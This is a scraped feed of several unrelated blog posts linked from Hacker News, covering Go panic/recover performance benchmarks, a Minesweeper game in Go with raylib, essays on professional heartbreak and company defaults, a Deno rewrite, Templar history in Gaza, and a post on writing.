    In the remainder of this post, I’ll assume Go 1.24 semantics and use the Go compiler (gc) of the same version.

    Roughly translated to Go and molded into a self-contained package, Bloch’s code snippet becomes the following programme (available on GitHub):

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    
    package main
    
    type Mountain struct{
      climbed bool
    }
    
    func (m *Mountain) Climb() {
      m.climbed = true
    }
    
    func main() {
      mountains := make([]Mountain, 8)
      ClimbAllPanicRecover(mountains)
    }
    
    func ClimbAllPanicRecover(mountains []Mountain) {
      defer func() {
        recover()
      }()
      for i := 0; ; i++ {
        mountains[i].Climb() // panics when i == len(mountains)
      }
    }
    
    func ClimbAll(mountains []Mountain) {
      for i := range mountains {
        mountains[i].Climb()
      }
    }

    (playground)

    As its name suggests, function ClimbAllPanicRecover abuses panic and recover for iterating over the input slice, whereas function ClimbAll stands for the more idiomatic reference implementation.

    Bloch never reveals what his Mountain class is made of or what its climb method does. To forestall any dead-code elimination by the compiler, I’ve opted to make my (*Mountain).Climb method mutate the climbed field of its receiver.

    The overhead of panic and recover is non-negligible

    Below are some benchmarks pitting ClimbAllPanicRecover against ClimbAll:

    package main
    
    import (
      "fmt"
      "testing"
    )
    
    var cases [][]Mountain
    
    func init() {
      for _, size := range []int{0, 1, 1e1, 1e2, 1e3, 1e4, 1e5} {
        s := make([]Mountain, size)
          cases = append(cases, s)
      }
    }
    
    func BenchmarkClimbAll(b *testing.B) {
      benchmark(b, "idiomatic", ClimbAll)
      benchmark(b, "panic-recover", ClimbAllPanicRecover)
    }
    
    func benchmark(b *testing.B, impl string, climbAll func([]Mountain)) {
      for _, ns := range cases {
        f := func(b *testing.B) {
          for b.Loop() {
            climbAll(ns)
          }
        }
        desc := fmt.Sprintf("impl=%s/size=%d", impl, len(ns))
        b.Run(desc, f)
      }
    }
    

    (Incidentally, if you’re not yet familiar with the new (*testing.B).Loop method, do check out the Go 1.24 release notes.)

    Let’s run those benchmarks on a relatively idle machine and feed the results to benchstat:

    $ go version 
    go version go1.24.0 darwin/amd64
    $ go test -run '^$' -bench . -count 10 -benchmem > results.txt
    $ benchstat -col '/impl@(idiomatic panic-recover)' results.txt
    goos: darwin
    goarch: amd64
    pkg: github.com/jub0bs/panicabused
    cpu: Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
                           │  idiomatic  │              panic-recover              │
                           │   sec/op    │    sec/op      vs base                  │
    ClimbAll/size=0-8        2.239n ± 8%   193.900n ± 1%  +8560.12% (p=0.000 n=10)
    ClimbAll/size=1-8        2.638n ± 1%   196.400n ± 2%  +7346.45% (p=0.000 n=10)
    ClimbAll/size=10-8       5.424n ± 1%   199.300n ± 2%  +3574.41% (p=0.000 n=10)
    ClimbAll/size=100-8      44.69n ± 1%    238.65n ± 4%   +434.01% (p=0.000 n=10)
    ClimbAll/size=1000-8     371.6n ± 0%     565.8n ± 1%    +52.27% (p=0.000 n=10)
    ClimbAll/size=10000-8    3.646µ ± 1%     3.906µ ± 0%     +7.15% (p=0.000 n=10)
    ClimbAll/size=100000-8   36.27µ ± 0%     36.54µ ± 1%     +0.73% (p=0.000 n=10)
    geomean                  95.10n          759.9n        +699.03%
    
                           │  idiomatic  │        panic-recover         │
                           │    B/op     │    B/op     vs base          │
    ClimbAll/size=0-8        0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=1-8        0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=10-8       0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=100-8      0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=1000-8     0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=10000-8    0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=100000-8   0.00 ± 0%     24.00 ± 0%  ? (p=0.000 n=10)
    geomean                            ¹   24.00       ?
    ¹ summaries must be >0 to compute geomean
    
                           │  idiomatic   │        panic-recover         │
                           │  allocs/op   │ allocs/op   vs base          │
    ClimbAll/size=0-8        0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=1-8        0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=10-8       0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=100-8      0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=1000-8     0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=10000-8    0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    ClimbAll/size=100000-8   0.000 ± 0%     1.000 ± 0%  ? (p=0.000 n=10)
    geomean                             ¹   1.000       ?
    ¹ summaries must be >0 to compute geomean
    

    The results are plain to see: ClimbAllPanicRecover is lumberingly slow in comparison to ClimbAll in the case of small enough input slices, for which the cost of panic and recover appears to dominate execution time. This observation echoes Bloch’s first counterargument: panic and recover, because their use is intended for truly exceptional circumstances, have no reason to be particularly fast.

    Moreover, each call to ClimbAllPanicRecover incurs an allocation of 24 bytes (on my 64-bit system, at least); although details are scarce, this heap allocation can be attributed to a runtime.boundsError with which the Go runtime eventually panics when the value of variable i reaches len(mountains). In comparison, ClimbAll never allocates and, therefore, doesn’t exert any unnecessary pressure on the garbage collector.

    The performance gap between the two implementations only closes as the length of the input slice increases and the cost of panic and recover drowns out in the rest of the workload.

    Recover precludes inlining

    At this stage, astute readers may suggest that ClimbAllPanicRecover’s disadvantage can be explained, at least in part, by inlining. Inlining is a compiler strategy that can be roughly described as “replacing a function call by the body of that function”. In many cases, inlining results in a speedup of execution. However, functions that contain defer statements cannot be inlined, and neither can functions that contain calls to recover. Therefore, contrary to ClimbAll, neither ClimbAllPanicRecover nor the anonymous function whose call it defers can be inlined. Close inspection of the optimisation decisions made by the compiler while building our programme confirms that much:

    $ go build -gcflags '-m=2' .
    # github.com/jub0bs/panicabused
    ./main.go:7:6: can inline (*Mountain).Climb with cost 4 as: method(*Mountain) func() { m.climbed = true }
    ./main.go:17:8: cannot inline ClimbAllPanicRecover.func1: call to recover
    ./main.go:16:6: cannot inline ClimbAllPanicRecover: unhandled op DEFER
    ./main.go:11:6: can inline main with cost 66 as: func() { mountains := make([]Mountain, 8); ClimbAllPanicRecover(mountains) }
    ./main.go:25:6: can inline ClimbAll with cost 14 as: func([]Mountain) { for loop }
    -snip-
    

    This observation echoes Bloch’s second counterargument: relying on panic and recover inhibits certain optimisations that the Go compiler might otherwise perform.

    Is the lack of inlining to blame for ClimbAllPanicRecover’s lacklustre performance, though? Evidently not: I selectively disabled inlining for ClimbAll by slapping a go:noinline directive on it and re-ran the benchmarks, but found that ClimbAll still vastly outperformed ClimbAllPanicRecover for all but large input slices. But an impossibility to inline a function can noticeably harm performance in more realistic scenarios.

    No bounds-check elimination for the unidiomatic implementation

    Like Java, Go is said to be memory-safe; in particular, per the language specification, implementations must trigger a run-time panic if a slice-indexing operation is ever out of bounds. Such bounds checks are relatively cheap, but they are not free. When the compiler can prove, perhaps via some heuristics, that some slice access cannot be out of bounds, it may omit, for better performance, the corresponding bounds check from the resulting executable. Besides, advanced programming techniques exist for gently nudging the compiler towards more bounds-check elimination.

    In the specific case of our little programme, the compiler can eliminate the bounds checks in ClimbAll’s loop, but not in ClimbAllPanicRecover’s:

    $ go build -gcflags="-d=ssa/check_bce/debug=1"
    # github.com/jub0bs/panicabused
    ./main.go:17:12: Found IsInBounds
    

    This observation echoes Bloch’s third counterargument: the idiomatic approach is more conducive to bounds-check elimination.

    What about internal handling of failure cases?

    At this stage, my facetious example may have convinced you that abusing panic and recover for control flow is not only unidiomatic but also detrimental to performance. More seriously, though, you may come across open-source projects that rely on panic and recover for handling internal failure cases. In fact, look no further than the standard library: this style is in full display in packages such as text/template, encoding/json, encoding/gob, and regexp/syntax.

    Expediency seems to be the primary motivation. Indeed, when the call stack is deep (perhaps on account of numerous recursive calls), relying on panic and recover obviates the need for much boilerplate; the error-handling logic can be centralised further up the stack, at the point of panic recovery, and the happy path can remain in focus.


    Panics should not be recovered too indiscrimately, though; a bug that triggers a panic will remain masked if a call to recover inadvertently swallows that panic:

    func ClimbAllPanic(mountains []Mountain) {
      defer func() {
        recover()
      }()
      for i := 0; ; i++ {
        mountains[i-1].Climb() // off-by-one error
      }
    }
    

    (playground)

    See issue 23012 for an example of such a problem in package encoding/json.


    But another, more surprising motivation for such a style is… performance! For instance, Max Hoffman and Raphael Poss separately report impressive speedups (on the happy path of their programme, at least) thanks to this style. Explanations range from a decreased need for intermediate function results and code that is comparatively friendlier to the CPU’s branch predictor. So it seems that panic and recover can be beneficial to performance in at least some situations.

    Should you try to emulate this style? Up to you. If you go down that road, though, do justify your design decision by a clarifying comment and perhaps some benchmark results; if you cannot provide such justification, you’re perhaps being too clever. Also, make sure to keep this design decision as an implementation detail of your package; don’t let panics that should remain internal leak through your package’s API, as your clients would then regrettably be forced to deal with them.

    Acknowledgements

    Thanks to the members of the Gophers Slack workspace who lurk in the #performance channel for an enlightening discussion, which fed into this post.

    ]]>
    https://jub0bs.com/posts/2025-02-28-cost-of-panic-recover/ hacker-news-small-sites-43217209 Sat, 01 Mar 2025 08:19:11 GMT
    <![CDATA[Minesweeper in Go]]> thread link) | @pltvss
    February 28, 2025 | https://pliutau.com/minesweeper-in-golang-raylib/ | archive.org

    📅 Fri, Feb 28, 2025 ⏱️ 4-minute read

    I remember when I was in school and didn’t have yet a PC at home (probably year ~2000), I would visit my Mom’s office to play some videogames on her work PC :) It was some Pentium and didn’t have many games in the beginning, but Minesweeper was always there as it came with Windows installation. Great times btw!

    Minesweeper

    I never been a game developer and know little about it, except some simple 2D games in the terminal or browser. So tools like Unity don’t inspire me, it’s too big. But what about Raylib? It’s a small (relatively) C library for videogames programming that I find quite fun to work with.

    And it has bindings in many languages if you don’t want to work with C directly. For Go there is a raylib-go that exposes the Raylib bindings. It also comes with the bindings for raygui. That should be more than enough to build the Minesweeper game and have some fun.

    On MacOS there is nothing extra that needs to be installed, just latest Go and we can get going.

    1
    2
    
    go get -v -u github.com/gen2brain/raylib-go/raylib
    go get -v -u github.com/gen2brain/raylib-go/raygui
    

    We can use then raygui to draw common elements like buttons, sliders, text. And raylib for collision detection (though there is not much of that in Minesweeper). We could also usee images for assets to draw mines and UI elements, but I decided to have a first version without that. Funny enough, I almost forgot the rules, but it took just a few minutes to be back in 2000s.

    Each game has a state, our state can be easy as:

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    
    type state struct {
        menu      bool // is menu open
        gameOver  bool
        gameWon   bool
        startedAt time.Time // simple metrics
        rows      int32
        cols      int32
        mines     int32
        field     [][]point // initial state will be generated
    }
    
    type point struct {
        hasMine    bool
        open       bool
        marked     bool
        neighbours int
    }
    

    When we open the game for the first time, we see the menu to select the difficulty, which has some presets of rows and columns as well as sliders. There we use raygui for these UI elements. And we use raylib to configure the app window itself.

     1
     2
     3
     4
     5
     6
     7
     8
     9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    
    package main
    
    import (
        gui "github.com/gen2brain/raylib-go/raygui"
        rl "github.com/gen2brain/raylib-go/raylib"
    )
    
    func (s *state) drawMenu() {
        // set window size and center it
        rl.SetWindowSize(w, h)
        rl.SetWindowPosition((rl.GetMonitorWidth(0)-int(w))/2, (rl.GetMonitorHeight(0)-int(h))/2)
    
        // raygui.Button can be used with a callback function quite nicely!
        if clicked := gui.Button(rl.NewRectangle(padding, rowh, buttonWidth, size), "BEGINNER"); clicked {
            s.rows = 9
            s.cols = 9
            s.mines = 10
        }
    
    
        // ...
    }
    

    You play Minesweeper with mouse (not sure how Vim users do that), and you need to detect left and right clicks. The left click we detected using the raygui.Button callback, for the right click we can use raylib’s main API:

    1
    2
    3
    4
    5
    6
    7
    8
    
    // Mark on right mouse button
    if rl.IsMouseButtonPressed(rl.MouseButtonRight) {
        if rl.CheckCollisionPointRec(rl.GetMousePosition(), rect) {
            if !s.field[x][y].open {
                s.field[x][y].marked = !s.field[x][y].marked
            }
        }
    }
    

    There is more code obviously (not that much, 300 lines in total), and you can find it on my GitHub.

    You can build it using standard Go’s build toolchain and play right after it.

    In probably 1 hour of this “recreational” programming I was able to play my Minesweeper and it worked really well. Yes, some visuals been missing, but the gameplay felt exactly as in 2000s. My wife enjoyed it the most, she played for a few hours straight :)

    Raylib kept its promise and was exactly fun and easy to work with. I will definitely try something else with it, probably from Zig.

    Some resources

    Have you built anything with raylib and/or raylib-go?

    ]]>
    https://pliutau.com/minesweeper-in-golang-raylib/ hacker-news-small-sites-43216855 Sat, 01 Mar 2025 07:28:48 GMT
    <![CDATA[Aztec C Museum Website]]> thread link) | @atan2
    February 28, 2025 | https://www.aztecmuseum.ca/intro.htm | archive.org

    Unable to extract article]]>
    https://www.aztecmuseum.ca/intro.htm hacker-news-small-sites-43216744 Sat, 01 Mar 2025 07:10:58 GMT
    <![CDATA[How I didn't deal with professional heartbreak]]> thread link) | @hunglee2
    February 28, 2025 | https://rossclennett.com/2025/02/how-i-didnt-deal-with-professional-heartbreak/ | archive.org

    On the last day of June 2001 I left a company that had consumed my professional life.

    After over a decade of hard work, success and fun, it was all over.

    Events at the company had taken an unexpected turn in the previous twelve months and the bright future I envisaged was no more.

    Although I resigned, it wasn’t what I wanted.

    As a senior leader, when you no longer have the confidence of the managing director, you have no future there.

    My departure was unnecessarily drawn out and messy, which added to the pain I was already experiencing.

    Thankfully, my fantastic team gave me an unofficial company farewell, showing their appreciation for my contribution and sadness at my departure.

    I moved from Sydney to Melbourne the day immediately after my last day at work and started a new job the following month.

    My former employer’s culture and financial performance ebbed away, then it was bought by a larger company that retired the brand within a few short years.

    It was only this week, when reading the Harvard Business Review, that I found a full and accurate description of the emotional turmoil I experienced all those years ago.

    The article by senior editor Gretchen Gavett discusses “professional heartbreak” described by author and host of The Anxious Achiever podcast Morra Aarons-Mele as, “….the loss of something work-related that feels as personally wounding as grief or heartbreak in your personal life. This can be because something happened that’s so deeply counter to your values system that you feel morally wounded. It can be the loss of something that you loved, like your business or a long tenure at a company, or a loss of a professional identity you’ve worked for many years to build. It can be a betrayal from a colleague, boss, or client you thought you knew. Regardless of the circumstances, professional heartbreak brings up all the big emotions.”

    Yes, yes, yes, yes, and yes.

    I felt grief.

    How it happened was counter to my values system and made me feel morally wounded.

    I had lost what I loved – my long-standing role in a company I was deeply committed to.

    I lost my professional identity.

    I felt betrayed by a person I thought I knew.

    As Morra Aarons-Mele says, “….professional heartbreak often stems from a fundamental clash between your personal values and those of your employer… (and) strikes deepest when our sense of self becomes inseparable from our work.”

    My sense of self was thoroughly intertwined with my work. The professional identity I had invested twelve years in building was gone (in my eyes, at least) because I refused to adjust my personal values to fit with those of my new boss.

    In mid-2023, former colleagues organised a reunion. Although it required flying to Sydney, I had nothing preventing me from attending. The reunion invitation even featured a photo of the three co-founders I took at the company’s five-year anniversary party.

    I didn’t go.

    Maybe I was still feeling a mixture of anger, shame and embarassment for how my tenure ended (although nobody attending the reunion played a role in my departure).

    The following week, I was sent the ‘remember when’ slide pack, which was shown at the reunion, and the photos taken that night.

    Looking through the slide pack and photos, I immediately regretted not attending.

    As I looked at all the familiar faces, from then and now, I remembered all the great people I worked for and with, and how much success and fun we had together.

    I needed to get over myself.

    The final piece of the emotional puzzle is finally having a label to describe my experience that I can identify with and embrace.

    Nearly twenty-four years ago, I went through tremendous professional heartbreak …and I am now over it.

    Related blogs

    The Good News About Being Fired

    The most emotionally intelligent leader I was lucky to work for

    More powerful lessons from The Rare Find: Think through the assignment

    ]]>
    https://rossclennett.com/2025/02/how-i-didnt-deal-with-professional-heartbreak/ hacker-news-small-sites-43216558 Sat, 01 Mar 2025 06:33:18 GMT
    <![CDATA[You Can't Delete the Default]]> thread link) | @smitec
    February 28, 2025 | https://www.elliotcsmith.com/you-cant-delete-the-default/ | archive.org

    Every company has a default. It’s the set of things that happen when nobody is pushing in any particular direction. Usually, its the combined momentum of all the pushing you’ve been doing. There are times in a company where its useful to remove that default. You want to break habits because the standard way is no longer the way things should happen. If you get to this point you’ll need to remember, you can’t just delete a default.

    You can try and delete a default. You can lay down the law that whatever the old way was, it’s not the way any more. You can insist that things are different now and you need to be doing things a different way. This might work for a little while. People will likely avoid the old patterns, especially when you’re looking. What usually ends up happening though is a new default forms. One that is a tiny step away from the old default such that it technically complies with the decree.

    This behaviour can sounds malicious on the surface. It isn’t. Defaults arise because people like patterns. People like to have systems that they can work within and work to improve. The defaults arise because they are the settled state of all the moving pieces in your business. When your company is small, say half a dozen people, you’re all talking a lot and can be very explicit about what the default is going to be. Any new idea or momentum easily spreads between everyone. Multiply your headcount by ten and the defaults often arise out of compromise. Compromise in all the little interconnections that nobody has explicitly set out to manage.

    If, as a manager or a founder, you see a default you don’t like, you need to find a way to replace it. Generally speaking, I would try keep your focus on the big defaults. How do people talk about the company? What, broadly, would people say no to because it’s not a fit? Big, identity level defaults that have a way of influencing all the others. These take deliberate focus and effort to change.

    Sometimes the new ‘default’ comes nicely wrapped in a brand new product. Maybe its a pivot or maybe its adding something to an existing platform or set of products. In this case, new defaults come fairly naturally. The best way to wrap them us is to treat the new thing like an experiment. If you have existing products and revenue you aren’t going to shift all your resources overnight. For every Slack style ‘we we’re a games company and now we do chat’ there are hundreds of smaller shifts.

    This ‘new product, new default’ shift is one of the simpler ones to make. You slowly push the new product more and more and slowly replace old patterns with new ones. You probably need to prepare for this path to be a slow one. By it’s nature, your new thing is new. It’s little, its different and people will likely need time to adjust. Again, you can probably assume nobody is malicious but people do get set in their ways.

    To put out a concrete, but somewhat redacted, example here I am currently working on a shift like this. I’ve been working to launch and grow a software platform within a startup that has a history more in line with tech enabled services. The product is adjacent but different. How we sell, what we build and who its for all rhyme with our existing customers but are different enough that there’s a need to manage the shifting defaults.

    Having this product be somewhat stand alone has let us launch without tearing down everything that was there before. We’ve now got a enough customers on board that we can start the process of turning what was initially an experiment into a set of new defaults.

    If the idea of slowly shifting defaults makes you feel frustrated and impatient then the other option is a big-bang shift in identity. You might call it a pivot, you might call it a rebrand. There are plenty of names for the process of tearing things back and laying down something new.

    This method is quicker. It is also riskier and requires a lot more focused effort. If you mess up a shift like this you risk losing all that was good about the old way and gaining none of the good from what’s new. There is also a very real possibility that you’ll fall into the trap of so many large companies and run a ‘internal rebrand’ that makes no difference to anyone except a small focus group who orchestrated the whole thing.

    Real systematic change requires that everyone buys into the new world order. People either need to follow along blindly (the less appealing option) or understand deeply why the defaults and fabric of the business are shifting.

    I have seen this kind of change work. Other that the suvivorship-bias laden stories from silicon valley these kinds of changes often pop up after hiring new senior leaders or finding new investors. That injection of ‘new’ can be enough of a catalyst to make these big changes possible. People, broadly speaking, have a fairly low tolerance for change for the sake of change. If they feel that’s what’s going on they’ll get frustrated.

    Tie it to the narrative of new leaders or new investment and you’ll have an easier time bringing people with you. This applies to both internal and external perceptions. Really doing this well requires a shift in both. If you position yourself to customers as one thing and then deliver another, you’ll lose customers. If you position yourself to staff as one thing and sell another you’ll lose staff.

    So much of keeping a startup alive and growing is setting the right expectations and delivering on them. As you grow, more and more of that delivery comes from your defaults. They exist out of necessity because people like to come to work and know they’re picking up from yesterday. You can change the defaults but whether it’s the slow burn of a new stealth product launch or the flash fire of reinventing yourself you need to remember, defaults get replaced they don’t get deleted.

    ]]>
    https://www.elliotcsmith.com/you-cant-delete-the-default/ hacker-news-small-sites-43216197 Sat, 01 Mar 2025 05:13:21 GMT
    <![CDATA[Who Did the Work?]]> thread link) | @surprisetalk
    February 28, 2025 | https://quarter--mile.com/Who-Did-The-Work | archive.org

    Unable to extract article]]>
    https://quarter--mile.com/Who-Did-The-Work hacker-news-small-sites-43215869 Sat, 01 Mar 2025 04:24:20 GMT
    <![CDATA[Deno shows us there's a better way]]> thread link) | @todsacerdoti
    February 28, 2025 | https://www.macchaffee.com/blog/2025/deno/ | archive.org

    Recently, I completed a full rewrite of my first personal project, which was a Django project running on Heroku. Now it's a Deno project running on Deno Deploy. The experience has really gotten me thinking about the amount of pain we put up with to deploy simple stuff these days, especially with containers. Deno shows us that it doesn't have to be that way.

    I know what you're thinking, "we already had a great setup: rsyncing PHP files". Unfortunately, rsyncing PHP files still lacks many critical features needed for more complicated projects. Collaboration, continuous integration, dependency management, multi-region support, scalability, preview environments, runtime security are just some of the features you'd have to build yourself. That's part of why containerization (and its ecosystem) has taken off, since it provides a well-trodden path for each of those features ("just a few more CNCF projects and we can really get this thing poppin'")

    But people have been saying for a long time that containers are painful to work with. Historically I've been a bit dismissive of those people because, like all technology, containers make tradeoffs. You have to tolerate the slow build times, bloated images, and YAML hell in order to get the language agnosticism, dependency bundling, immutability, and access to Kubernetes and other projects that give your app superpowers as long as it's containerized. At least, that's what I used to believe.

    Deno seems to take a holistic approach, where the development environment, deployment method, and infrastructure are all self-contained within the deno CLI. Maybe some of this comes from Golang's decision to bundle the package manager and the formatter/linter directly into the language, which Deno does as well.

    I think this is a smart move. The more mature platforms I see have more tight integration with the application code itself. Normally this is a set of config files (terraform or k8s manifests), but there have been efforts to replace config files will full languages such as Pulumi. Even before that, there were libraries like Netflix's Hysterix which bakes a service mesh into application code (before service meshes even existed). I think these threads of history tie into Deno's all-in-one approach to produce a nice developer experience with just a git repo and a CLI tool.

    The rewrite

    The Django project that I rewrote in Deno is your typical 3-tier web app. I'd classify it as a non-trivial application that took me maybe 30 eight-hour working days to build originally (which translates to years of weekend coding). I was able to rewrite it in a week of evenings, about 4 work days. And this was my first experience writing TypeScript/Deno, so I had to look up a bunch of simple questions like how to do loops or create maps!

    • The development environment setup is easy, just a curl | bash to get the Deno CLI. The language server can be installed easily into Zed or VS Code. No messing around with JDKs or system Python versions.
    • Packages are cached globally but tracked/locked in your git repo, so no giant node_modules folder and no Python virtual environments.
    • Everything you need to develop—including data storage via Deno KV—is included in the CLI, so no need for Docker.
    • Package install times are so fast that I wasn't bothered by the fact that Deno's caching/vendoring was broken when I tried to set up Gitlab CI.
    • Compile/run/test times seem nearly instantaneous (it is a small project with only a single dependency), so I was able to run tests as a pre-commit hook without even noticing a delay.
    • Deployment to multiple regions with a highly available database only takes a single command which runs several times quicker than the Heroku deployments I was doing before.
    • Deno has capabilities-based security, where it doesn't get the ability to spawn arbitrary processes, read environment variables, or read/write any file in your home folder.

    The beautiful thing is that (no offense) I don't think any of these are revolutionary ideas on their own. I don't even think it'd be too hard to add these features to existing languages. Just seems like nobody else seems keen on bringing all of these elements together.

    There were some rough edges, and I know Deno has a lot of beta-quality things, but they've been in beta for a while. The metrics and logs are lacking, I had some issues with the API docs, some error messages were unclear, you can't simply download a backup of your KV data, and I hit the classic React issue where some content refers to old Deno features/techniques that don't exist anymore. One big missing feature was that I can't imagine running a Deno Deploy site without a caching/rate-limiting CDN in front to control costs, which is such an easy feature Deno could include. Without that, kinda defeats the whole purpose of running at the edge.

    Conclusion

    Computers are so ridiculously powerful these days that it's so weird we still have CI/CD pipelines that take tens of minutes. SQLite runs 300k test cases in "only a few minutes" on every commit. We also have huge servers with huge disks where you could store the top 99% of every library, package, binary, etc., completely eliminating the need for CI/CD caching. We have advanced compilers that can do incremental compilation. We have an enormous pool of seasoned software engineers who could bring all these things together, and an enormous tech industry itching to pay for it. Maybe if everyone wasn't busy building ad tech and chat bots, we'd get somewhere.

    ]]>
    https://www.macchaffee.com/blog/2025/deno/ hacker-news-small-sites-43215809 Sat, 01 Mar 2025 04:14:56 GMT
    <![CDATA[The Knights Templar in Gaza]]> thread link) | @vinnyglennon
    February 28, 2025 | https://thetemplarknight.com/2024/01/14/the-knights-templar-in-gaza/ | archive.org

    Gaza is in the news right now as Israel and Hamas clash in this relatively small piece of territory that is nevertheless densely populated. A little known fact about Gaza is that it was a stronghold of the Knights Templar during the Crusades.

    The city fell to the crusaders in 1100, just a year after Jerusalem had been taken. It was of huge strategic importance being so close to the enemy Fatimid empire, a Shia Muslim realm centred on Egypt. Around 1149, the Knights Templar were tasked with holding the city. Taking Gaza allowed the Kingdom of Jerusalem to encircle nearby Ascalon, which was still under Fatimid control. With Gaza transformed into a Templar stronghold, the supply routes from Egypt to Ascalon were disrupted.

    In 1153, Ascalon fell to the crusaders after a victorious siege in which the Templars played a major role. A year later, in 1154, the Muslim chronicler Abu Abdullah Muhammad al-Idrisi conceded that under Templar control, Gaza was thriving and its once severely reduced population had recovered, benefiting from being located on a key trading route. Indeed as Gaza grew, people were encouraged to build homes outside the city wall under Templar protection.

    Promoting Christianity was at the centre of the Templar mission. In 1149, a large church was built in the city on top of the ruins of what had been a 6th century Byzantine Christian church then transformed into a mosque, after Muslim armies invaded in the 7th century, but subsequently badly damaged by an earthquake in 1033 that sent the minaret crashing down on to the building.

    Going back further in history, like so many churches, the site had originally been a pagan temple. But not just any old pagan temple. This was the Philistine temple to the god Dagon famously toppled by Samson in the bible. The building reverted to being a mosque after the Templars gave up Gaza but traces of the crusader church were still very visible for centuries. However, much of the mosque and its medieval Christian remains were destroyed in an Israeli air strike in December 2023.

    In 1170, the Templars completed the construction of a fortress in Gaza. But in that same year, the Saracen leader Saladin – who had unified Egypt and Syria and now posed a huge threat to the crusaders – attacked Gaza. Many of the Templars were not present having been ordered to help King Almaric of Jerusalem defend another nearby town. Gaza was left under the control of a cousin of the king, Miles de Plancy. The medieval chronicler William of Tyre described De Plancy as a degenerate drunk unfit to hold such an important position.

    Faced by this surprise assault from Saladin, and with few Templars around to defend the city, De Plancy raised the drawbridge, preventing defenceless inhabitants entering the fortress, which led to their slaughter by Saladin’s soldiers. It seems that De Plancy’s view was that these untrained people should do their best to fight the invaders while he watched from the battlements. What he witnessed was a horrific bloodbath. However, Saladin did not take Gaza that day.

    Emboldened, Saladin amassed a huge army and began ravaging the countryside around Gaza and Ascalon in 1177. His troops fanned out over the area becoming a little lax in terms of discipline. Reportedly, there were tens of thousands of Saracens looting and taking supplies all within crusader territory. King Baldwin IV of Jerusalem, the teenage monarch who famously suffered from leprosy, decided to strike back. Together with the Templars he inflicted a stunning defeat on Saladin at the Battle of Montgisard, sending the Muslim leader fleeing back to Egypt – defeated despite his overwhelming superiority in terms of troop numbers.

    This was the high point for the Templars in the Holy Land where they evidenced the effectiveness of their battle tactics and incredible discipline, moulded by their spiritual ethos. But – pride comes before a fall. And Saladin learned his lessons well. By 1187, the Templar grand master was the mercurial Gerard de Ridefort who spent a great deal of time immersed in the turbulent court politics of the kingdom of Jerusalem. On July 4 of that year, he led his Templar army to a terrible defeat at the Battle of Hattin, largely because he refused to take advice from crusaders he disliked for political and personal reasons.

    De Ridefort was taken prisoner by Saladin but the Templars negotiated his release in return for surrendering Gaza. Not long after, Saladin made a point of destroying Gaza’s fortifications. The city was retaken in a subsequent crusade by Richard the Lionheart but then went back to Muslim rule before being completely flattened by a Mongol army under Hulagu Khan in the 13th century.

    ]]>
    https://thetemplarknight.com/2024/01/14/the-knights-templar-in-gaza/ hacker-news-small-sites-43215277 Sat, 01 Mar 2025 03:01:22 GMT
    <![CDATA[Some people have it, some people don't?]]> thread link) | @herbertl
    February 28, 2025 | https://herbertlui.net/some-people-have-it-some-people-dont/ | archive.org

    A few years ago, I wrote that writing is thinking. You are better off writing to think, not trying to think before you write.

    “But some people are just better at it,” Ant K writes in a comment (which Karolis recently agreed with). He compared his work with another author he held in high esteem. “He has it. I don’t.” 

    While there are different people with different talents when it comes to writing, it just doesn’t really matter.

    Or, rather, it matters as much as you think it matters.

    I used to think I didn’t have interesting life experiences to write about. While my grandparents and parents had all of the adventures (including immigrating from Hong Kong to Canada), I grew up in the suburbs in Canada. There were literally hundreds of thousands of kids who did the same thing. What could I possibly have to write about that people would consider interesting?

    While an occasional English teacher would praise my skills, I had slightly above average writing skills at best. Certainly not comparable to the authors I held in high esteem, or anything that I thought would be worth pitching a traditional media publication.

    These beliefs didn’t make me feel better, and it didn’t encourage me to write. After a long time—too long—I chose to see the world differently. You could say all of Creative Doing was me working through this belief and rewiring my brain. After I made that decision, I realized that I had a lot to offer. I have to keep practicing this decision by writing in my journal. I often turn to Byron Katie’s framework, The Work. Derek Sivers also wrote some great questions for reframing.

    It was as if my brain started accepting that I had a story tell, and actually remembered these life experiences. How I grew up in church six days a week. How existential philosophy changed my life. How technology shaped my life. How I experienced my first kiss one random Saturday night. How lost I felt in business school. How determined I was to become a writer—even when I believed that I didn’t matter—that I started my professional writing career by writing for dollars per post. And so much more… (I’m writing some of these stories for my next book right now!)

    If “Some people have it, some don’t,” encourages you to practice—then by all means, believe it. But if that narrative does not encourage you to practice, then you would benefit from choosing a more energizing, liberating, belief. You may be surprised at how your brain rises to the occasion.

    While my original response to Ant was to focus more on the intrinsic rewards of writing, and not to compare his work to someone else’s, I’d certainly make the case now that when you write and publish, you are adding another option to the world—which makes it better

    Even if you don’t think your work holds a candle up to the author you admire, someone may be able to relate to your work in a way that they can’t to anyone else’s. They had to hear you say it your way. If it changes even one person’s life slightly, it would have been worth it.

    It’s not about what you have, it’s about what you give. And in order to give more of yourself, you will need to accept yourself. What’s definitely true is you have something—everybody does. It’s up to you to decide whether you are willing to share it or not.

    ]]>
    https://herbertlui.net/some-people-have-it-some-people-dont/ hacker-news-small-sites-43214973 Sat, 01 Mar 2025 02:25:02 GMT
    <![CDATA[Magic isn't real]]> thread link) | @SchwKatze
    February 28, 2025 | https://pthorpe92.dev/magic/ | archive.org

    Any sufficiently advanced technology is indistinguishable from magic.

    • Arthur C. Clarke

